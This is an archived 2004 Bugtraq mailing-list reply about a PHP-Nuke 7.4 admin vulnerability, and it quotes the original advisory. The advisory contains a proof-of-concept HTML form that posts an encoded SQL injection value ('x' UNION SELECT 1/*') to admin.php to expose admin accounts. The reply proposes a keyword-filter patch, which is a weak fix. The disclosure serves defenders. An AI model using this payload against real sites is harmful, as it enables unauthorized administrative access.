Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos network security services platform







Bugtraq: Re: [XSS] PHP-Nuke 7.4 Bugs

Re: [XSS] PHP-Nuke 7.4 Bugs

From: Blaine Elzey <lz_at_lzmarine.net>
Date: Sun, 5 Sep 2004 07:56:11 -0400

This seems like more of a SQL injection bug.

$admin value "eCcgVU5JT04gU0VMRUNUIDEvKjox" decodes to "x' UNION SELECT 1/*:1"
which will cause the pwd check to be manipulated into union selecting the
valid password.

7.4 Patch can be in auth.php, replace line (about) 61
  if ($aid=="" || $pwd=="") {
with
  if ($aid=="" || $pwd=="" || stristr($aid,'select')) {

I don't know if 7.5 is also vulnerable.

Blaine Elzey 

-- 
Powered by: Open WebMail Project (http://openwebmail.org) 
---------- Original Message -----------
From: Pierquinto Manco <mantra_at_ntj.it>
To: bugtraq_at_securityfocus.com
Sent: 4 Sep 2004 08:19:26 -0000
Subject: [XSS] PHP-Nuke 7.4 ViewAdmin Bug
> **************************************************************
> * 			CODEBUG Labs
> * Advisory #3
> * Title: ViewAdmin Bug
> * Author: Pierquinto 'Mantra' Manco
> * Product: PHP-Nuke 7.4
> * Type: XSS
> * Web: http://www.mantralab.org
> *
> **************************************************************
> 
> 	              View Admin Bug
> 
> - ) Description
> PHP-Nuke is a very bugged web CMS, version 7.4 has critical
> XSS bug that permit to an attacker to view Admin account aid 
> and to use this information to delete account using Delete Admin Bug 
> (CODEBUG #2).
> This bug is very old too but we can bypass the patch sending data 
> by POST instead of GET.
> 
> - ) Proof-of-Concept
> Create a HTML file with this lines:
> 
> <form name="form1" method="POST"
action="http://www.sitewithphpnuke.com/admin.php">
>     <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
>     <br>
>     <input type="hidden" name="add_radminsuper" value="1">
>     <br>
>     <input type="hidden" name="op" value="mod_authors">
>       <input type="submit" name="Submit" value="Display">
>     <br>
>   </p>
> </form>
> 
> - ) Patch
> 
> Apply this code to your admin.php file:
> 
> if ( !empty($HTTP_GET_VARS['op']) ) {
> 	$op = $HTTP_GET_VARS['op'];
> }
> 
> if ( !empty($HTTP_POST_VARS['op']) ) {
> 	$op = $HTTP_POST_VARS['op'];
> }
> 
> -) Note
> 
> There are a lot of this problem in PHP-Nuke 7.4, my patch will check
> the content of $_POST[op] and $_GET[op].
> I'm going to post all this vulnerabilities on my site...
> http://www.mantralab.org
> 
> **************************************************************
> 		http://www.mantralab.org
> **************************************************************
------- End of Original Message -------
Received on Sep 07 2004
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]